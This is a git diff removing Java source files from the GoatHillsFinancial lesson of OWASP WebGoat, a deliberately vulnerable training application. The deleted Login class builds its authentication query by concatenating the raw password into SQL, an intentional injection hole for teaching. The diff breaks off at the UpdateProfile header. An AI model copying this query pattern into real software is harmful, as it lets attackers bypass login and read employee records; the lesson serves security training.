@@ -1,115 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.PreparedStatement; -import java.sql.ResultSet; -import java.sql.SQLException; -import org.owasp.webgoat.session.Employee; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class EditProfile extends DefaultLessonAction -{ - - public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName) - { - super(lesson, lessonName, actionName); - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, - UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) - { - int userId = getUserId(s); - int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee); - } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.EDITPROFILE_ACTION; - } - - public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try - { - String query = "SELECT * FROM employee WHERE userid = ?"; - - try - { - PreparedStatement answer_statement = WebSession.getConnection(s) - .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - answer_statement.setInt(1, subjectUserId); - ResultSet answer_results = answer_statement.executeQuery(); - if (answer_results.next()) - { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), - answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results - .getString("title"), answer_results.getString("phone"), answer_results - .getString("address1"), answer_results.getString("address2"), answer_results - .getInt("manager"), answer_results.getString("start_date"), answer_results - .getInt("salary"), answer_results.getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results - .getString("disciplined_notes"), answer_results.getString("personal_description")); - /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + - * " " + profile.getLastName() + " (" + profile.getId() + ")"); - */} - } catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); - } - - return profile; - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java deleted file mode 100644 index c38b14b44..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java +++ /dev/null 
@@ -1,161 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.PreparedStatement; -import java.sql.ResultSet; -import java.sql.SQLException; -import org.owasp.webgoat.session.Employee; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.ValidationException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class FindProfile extends DefaultLessonAction -{ - - private LessonAction chainedAction; - - public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, - UnauthorizedException, ValidationException - { - if (isAuthenticated(s)) - { - int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); - - String pattern = s.getParser().getRawParameter(GoatHillsFinancial.SEARCHNAME); - - findEmployeeProfile(s, userId, pattern); - - // Execute the chained Action if the employee was found. - if (foundEmployee(s)) - { - try - { - chainedAction.handleRequest(s); - } catch (UnauthenticatedException ue1) - { - // System.out.println("Internal server error"); - ue1.printStackTrace(); - } catch (UnauthorizedException ue2) - { - // System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - String page = GoatHillsFinancial.SEARCHSTAFF_ACTION; - - if (foundEmployee(s)) page = GoatHillsFinancial.VIEWPROFILE_ACTION; - - return page; - } - - private boolean foundEmployee(WebSession s) - { - boolean found = false; - try - { - getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID); - found = true; - } catch (ParameterNotFoundException e) - { - } - - return found; - } - - public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException - { - Employee profile = null; - // Clear any residual employee id's in the session now. - removeSessionAttribute(s, getLessonName() + "." 
+ GoatHillsFinancial.EMPLOYEE_ID); - - // Query the database for the profile data of the given employee - try - { - String query = "SELECT * FROM employee WHERE first_name LIKE ? OR last_name LIKE ?"; - - try - { - PreparedStatement answer_statement = WebSession.getConnection(s) - .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - answer_statement.setString(1, "%" + pattern + "%"); - answer_statement.setString(2, "%" + pattern + "%"); - ResultSet answer_results = answer_statement.executeQuery(); - - // Just use the first hit. - if (answer_results.next()) - { - int id = answer_results.getInt("userid"); - // Note: Do NOT get the password field. - profile = new Employee(id, answer_results.getString("first_name"), answer_results - .getString("last_name"), answer_results.getString("ssn"), - answer_results.getString("title"), answer_results.getString("phone"), answer_results - .getString("address1"), answer_results.getString("address2"), answer_results - .getInt("manager"), answer_results.getString("start_date"), answer_results - .getInt("salary"), answer_results.getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results - .getString("disciplined_notes"), answer_results.getString("personal_description")); - - /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + - * " " + profile.getLastName() + " (" + profile.getId() + ")"); - */ - setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id)); - } - } catch (SQLException sqle) - { - s.setMessage("Error finding employee profile"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error finding employee profile"); - e.printStackTrace(); - } - - return profile; - } - -} 
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java deleted file mode 100644 index acd026747..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java +++ /dev/null 
@@ -1,327 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.util.ArrayList; -import java.util.Hashtable; -import java.util.List; -import java.util.Map; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.html.A; -import org.apache.ecs.html.IMG; -import org.owasp.webgoat.lessons.RandomLessonAdapter; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.ValidationException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class GoatHillsFinancial extends RandomLessonAdapter -{ - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - public final static String DESCRIPTION = "description"; - - public final static String DISCIPLINARY_DATE = "disciplinaryDate"; - - public final static String DISCIPLINARY_NOTES = "disciplinaryNotes"; - - public final static String CCN_LIMIT = "ccnLimit"; - - public final static String CCN = "ccn"; - - public final static String SALARY = "salary"; - - public final static String START_DATE = "startDate"; - - public final static String MANAGER = "manager"; - - public final static String ADDRESS1 = "address1"; - - public final static String ADDRESS2 = "address2"; - - public final static String PHONE_NUMBER = "phoneNumber"; - - public final static String TITLE = "title"; - - public final static String SSN = "ssn"; - - public final static String LAST_NAME = "lastName"; - - public final static String FIRST_NAME = "firstName"; - - public final static String PASSWORD = "password"; - - public final static String EMPLOYEE_ID = "employee_id"; - - public final static String USER_ID = "user_id"; - - public final static String SEARCHNAME = "search_name"; - - public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult"; - - public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee"; - - public final static String STAFF_ATTRIBUTE_KEY = "Staff"; - - public final static String LOGIN_ACTION = "Login"; - - public final static String LOGOUT_ACTION = "Logout"; - - public final static String LISTSTAFF_ACTION = "ListStaff"; - - public final static String SEARCHSTAFF_ACTION = "SearchStaff"; - - public final static String FINDPROFILE_ACTION = "FindProfile"; - - public final static String VIEWPROFILE_ACTION = "ViewProfile"; - - public final 
static String EDITPROFILE_ACTION = "EditProfile"; - - public final static String UPDATEPROFILE_ACTION = "UpdateProfile"; - - public final static String CREATEPROFILE_ACTION = "CreateProfile"; - - public final static String DELETEPROFILE_ACTION = "DeleteProfile"; - - public final static String ERROR_ACTION = "error"; - - private final static Integer DEFAULT_RANKING = new Integer(125); - - private Map lessonFunctions = new Hashtable(); - - public GoatHillsFinancial() - { - String myClassName = parseClassName(this.getClass().getName()); - registerActions(myClassName); - } - - protected void registerActions(String className) - { - registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); - registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); - registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); - registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); - registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); - - // These actions are special in that they chain to other actions. 
- registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION))); - registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION))); - registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); - } - - protected final String parseClassName(String fqcn) - { - String className = fqcn; - - int lastDotIndex = fqcn.lastIndexOf('.'); - if (lastDotIndex > -1) className = fqcn.substring(lastDotIndex + 1); - - return className; - } - - protected void registerAction(LessonAction action) - { - lessonFunctions.put(action.getActionName(), action); - } - - public String[] getStages() - { - return new String[] {}; - } - - protected List getHints(WebSession s) - { - return new ArrayList(); - } - - public String getInstructions(WebSession s) - { - return ""; - } - - protected LessonAction getAction(String actionName) - { - return lessonFunctions.get(actionName); - } - - public void handleRequest(WebSession s) - { - if (s.getLessonSession(this) == null) s.openLessonSession(this); - - String requestedActionName = null; - try - { - requestedActionName = s.getParser().getStringParameter("action"); - } catch (ParameterNotFoundException pnfe) - { - // Let them eat login page. - requestedActionName = LOGIN_ACTION; - } - - try - { - LessonAction action = getAction(requestedActionName); - if (action == null) - { - setCurrentAction(s, ERROR_ACTION); - } - else - { - // System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " + - // action.getActionName()); - if (action.requiresAuthentication()) - { - if (action.isAuthenticated(s)) - { - action.handleRequest(s); - } - else - throw new UnauthenticatedException(); - } - else - { - // Access to Login does not require authentication. 
- action.handleRequest(s); - } - } - } catch (ParameterNotFoundException pnfe) - { - // System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } catch (ValidationException ve) - { - // System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } catch (UnauthenticatedException ue) - { - s.setMessage("Login failed"); - // System.out.println("Authentication failure"); - ue.printStackTrace(); - } catch (UnauthorizedException ue2) - { - s.setMessage("You are not authorized to perform this function"); - // System.out.println("Authorization failure"); - setCurrentAction(s, ERROR_ACTION); - ue2.printStackTrace(); - } catch (Exception e) - { - // All other errors send the user to the generic error page - // System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - - // All this does for this lesson is ensure that a non-null content exists. - setContent(new ElementContainer()); - } - - public boolean isAuthorized(WebSession s, int userId, String functionId) - { - // System.out.println("Checking authorization from " + getCurrentAction(s)); - LessonAction action = getAction(getCurrentAction(s)); - return action.isAuthorized(s, userId, functionId); - } - - public int getUserId(WebSession s) throws ParameterNotFoundException - { - LessonAction action = getAction(getCurrentAction(s)); - return action.getUserId(s); - } - - public String getUserName(WebSession s) throws ParameterNotFoundException - { - LessonAction action = getAction(getCurrentAction(s)); - return action.getUserName(s); - } - - protected String getJspPath() - { - return "/lessons/" + getLessonName() + "/"; - } - - public String getTemplatePage(WebSession s) - { - return getJspPath() + getLessonName() + ".jsp"; - } - - public String getPage(WebSession s) - { - String page = getJspPath() + getCurrentAction(s) + ".jsp"; - - return page; - } - - protected Integer 
getDefaultRanking() - { - return DEFAULT_RANKING; - } - - public String getTitle() - { - return "Goat Hills Financials"; - } - - public String getSourceFileName() - { - // FIXME: Need to generalize findSourceResource() and use it on the currently active - // LessonAction delegate to get its source file. - // return findSourceResource(getCurrentLessonScreen()....); - return super.getSourceFileName(); - } - - @Override - protected boolean getDefaultHidden() - { - return getClass().equals(GoatHillsFinancial.class); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } - - @Override - protected String getLessonName() - { - String className = getClass().getName(); - int index = className.lastIndexOf('.'); - if (index > -1) return className.substring(index + 1); - return super.getLessonName(); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java deleted file mode 100644 index a569390a0..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java +++ /dev/null 
@@ -1,29 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-public interface LessonAction
-{
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException, ValidationException;
-
- public String getNextPage(WebSession s);
-
- public String getActionName();
-
- public boolean requiresAuthentication();
-
- public boolean isAuthenticated(WebSession s);
-
- public boolean isAuthorized(WebSession s, int employeeId, String functionId);
-
- public int getUserId(WebSession s) throws ParameterNotFoundException;
-
- public String getUserName(WebSession s) throws ParameterNotFoundException;
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
deleted file mode 100644
index ce684723e..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
+++ /dev/null
@@ -1,112 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.ResultSet; -import java.sql.SQLException; -import java.sql.Statement; -import java.util.List; -import java.util.Vector; -import org.owasp.webgoat.session.EmployeeStub; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class ListStaff extends DefaultLessonAction -{ - - public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName) - { - super(lesson, lessonName, actionName); - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, - UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) - { - int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); - - List employees = getAllEmployees(s, userId); - setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees); - } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.LISTSTAFF_ACTION; - } - - public List getAllEmployees(WebSession s, int userId) throws UnauthorizedException - { - // Query the database for all employees "owned" by the given employee - - List employees = new Vector(); - - try - { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in " - + "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")"; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) - { - int employeeId = answer_results.getInt("userid"); - String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - // System.out.println("Retrieving employee stub for role " + role); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); - employees.add(stub); - } - } catch 
(SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error getting employees"); - e.printStackTrace(); - } - - return employees; - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java deleted file mode 100644 index 682ab44ac..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java +++ /dev/null 
@@ -1,191 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.ResultSet; -import java.sql.SQLException; -import java.sql.Statement; -import java.util.List; -import java.util.Vector; -import org.owasp.webgoat.session.EmployeeStub; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.ValidationException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class Login extends DefaultLessonAction -{ - - private LessonAction chainedAction; - - public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException - { - // System.out.println("Login.handleRequest()"); - getLesson().setCurrentAction(s, getActionName()); - - List employees = getAllEmployees(s); - setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees); - - int employeeId = -1; - try - { - employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); - String password = s.getParser().getStringParameter(GoatHillsFinancial.PASSWORD); - - // Attempt authentication - if (login(s, employeeId, password)) - { - // Execute the chained Action if authentication succeeded. - try - { - chainedAction.handleRequest(s); - } catch (UnauthenticatedException ue1) - { - // System.out.println("Internal server error"); - ue1.printStackTrace(); - } catch (UnauthorizedException ue2) - { - // System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - else - s.setMessage("Login failed"); - } catch (ParameterNotFoundException pnfe) - { - // No credentials offered, so we log them out - setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE); - } - } - - /** - * After this.handleRequest() is called, when the View asks for the current JSP to load, it will - * get one initialized by this call. 
- */ - public String getNextPage(WebSession s) - { - String nextPage = GoatHillsFinancial.LOGIN_ACTION; - - if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s); - - return nextPage; - - } - - public boolean requiresAuthentication() - { - return false; - } - - public boolean login(WebSession s, int userId, String password) - { - // System.out.println("Logging in to lesson"); - boolean authenticated = false; - - try - { - String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'"; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.first()) - { - setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE); - setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID, Integer.toString(userId)); - authenticated = true; - } - - } catch (SQLException sqle) - { - s.setMessage("Error logging in"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error logging in"); - e.printStackTrace(); - } - - // System.out.println("Lesson login result: " + authenticated); - return authenticated; - } - - public List getAllEmployees(WebSession s) - { - List employees = new Vector(); - - // Query the database for all roles the given employee belongs to - // Query the database for all employees "owned" by these roles - - try - { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles " - + "where employee.userid=roles.userid"; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) - { - int employeeId = answer_results.getInt("userid"); - 
String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); - employees.add(stub); - } - } catch (SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error getting employees"); - e.printStackTrace(); - } - - return employees; - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java deleted file mode 100644 index f6add7f4f..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java +++ /dev/null 
@@ -1,76 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.ValidationException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class Logout extends DefaultLessonAction -{ - - private LessonAction chainedAction; - - public Logout(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException - { - // System.out.println("Logging out"); - - setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE); - - // FIXME: Maybe we should forward to Login. - try - { - chainedAction.handleRequest(s); - } catch (UnauthenticatedException ue1) - { - // System.out.println("Internal server error"); - ue1.printStackTrace(); - } catch (UnauthorizedException ue2) - { - // System.out.println("Internal server error"); - ue2.printStackTrace(); - } - - } - - public String getNextPage(WebSession s) - { - return chainedAction.getNextPage(s); - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java deleted file mode 100644 index a0194a358..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java +++ /dev/null 
@@ -1,47 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. - * - * For details, please see http://webgoat.github.io - */ -public class SearchStaff extends DefaultLessonAction -{ - - public SearchStaff(GoatHillsFinancial lesson, String lessonName, String actionName) - { - super(lesson, lessonName, actionName); - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.SEARCHSTAFF_ACTION; - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java deleted file mode 100644 index 3e73ddb88..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java +++ /dev/null 
